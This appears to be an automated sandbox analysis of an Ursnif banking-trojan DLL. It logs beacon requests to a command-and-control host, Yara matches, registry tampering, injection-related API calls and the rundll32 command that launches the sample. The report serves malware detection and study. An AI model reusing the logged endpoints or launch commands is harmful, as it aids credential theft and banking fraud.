Source: global traffic HTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic HTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: unknown HTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: uT9rwkGATJ.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A21B4 0_2_6E1A21B4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B04C40 0_2_00B04C40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0AF24 0_2_00B0AF24
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B02B76 0_2_00B02B76
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00670C49 0_2_00670C49
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00670CBE 0_2_00670CBE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5348B 0_2_00B5348B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B51C14 0_2_00B51C14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B571AA 0_2_00B571AA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B561D5 0_2_00B561D5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B68D77 0_2_00B68D77
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B59F02 0_2_00B59F02
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5135C 0_2_00B5135C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00570CBE 2_2_00570CBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00570C49 2_2_00570C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02DA0CBE 3_2_02DA0CBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02DA0C49 3_2_02DA0C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03349F02 3_2_03349F02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334135C 3_2_0334135C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334EBA2 3_2_0334EBA2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03358D77 3_2_03358D77
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033471AA 3_2_033471AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033461D5 3_2_033461D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03341C14 3_2_03341C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334348B 3_2_0334348B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BD4C40 4_2_02BD4C40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BDAF24 4_2_02BDAF24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BD2B76 4_2_02BD2B76
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00840CBE 4_2_00840CBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00840C49 4_2_00840C49
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A13B8 GetProcAddress,NtCreateSection,memset, 0_2_6E1A13B8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E1A15C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1273 NtMapViewOfSection, 0_2_6E1A1273
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A23D5 NtQueryVirtualMemory, 0_2_6E1A23D5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B094E8 NtMapViewOfSection, 0_2_00B094E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B09269 GetProcAddress,NtCreateSection,memset, 0_2_00B09269
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B05D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00B05D10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0B149 NtQueryVirtualMemory, 0_2_00B0B149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6F02A NtQueryInformationProcess, 0_2_00B6F02A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_00B5D5B8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B645D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_00B645D7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B60DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00B60DD9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B665CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_00B665CE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_00B6D103
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_00B5CC12
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B7186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00B7186D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00B5B9B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_00B6E9C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B662DC NtGetContextThread,RtlNtStatusToDosError, 0_2_00B662DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5979A memset,NtQueryInformationProcess, 0_2_00B5979A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B56F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_00B56F3E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B76B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00B76B6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335420A GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_0335420A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_0335D103
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_0334D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033545D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_033545D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03350DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_03350DD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033565CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_033565CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335F02A NtQueryInformationProcess, 3_2_0335F02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03346F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_03346F3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03366B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_03366B6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334979A memset,NtQueryInformationProcess, 3_2_0334979A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033562DC NtGetContextThread,RtlNtStatusToDosError, 3_2_033562DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_0334B9B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_0335E9C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_0334CC12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03360C0C NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_03360C0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0336186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_0336186D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_02BD5D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BDB149 NtQueryVirtualMemory, 4_2_02BDB149
PE file does not import any functions
Source: hiiw3gsl.dll.31.dr Static PE information: No import functions for PE file found
Source: uio4qdnj.dll.29.dr Static PE information: No import functions for PE file found
Source: ebytp2em.dll.35.dr Static PE information: No import functions for PE file found
Source: hjljqxud.dll.32.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\loaddll32.exe Section loaded: mspdb140.dll Jump to behavior
Source: uT9rwkGATJ.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
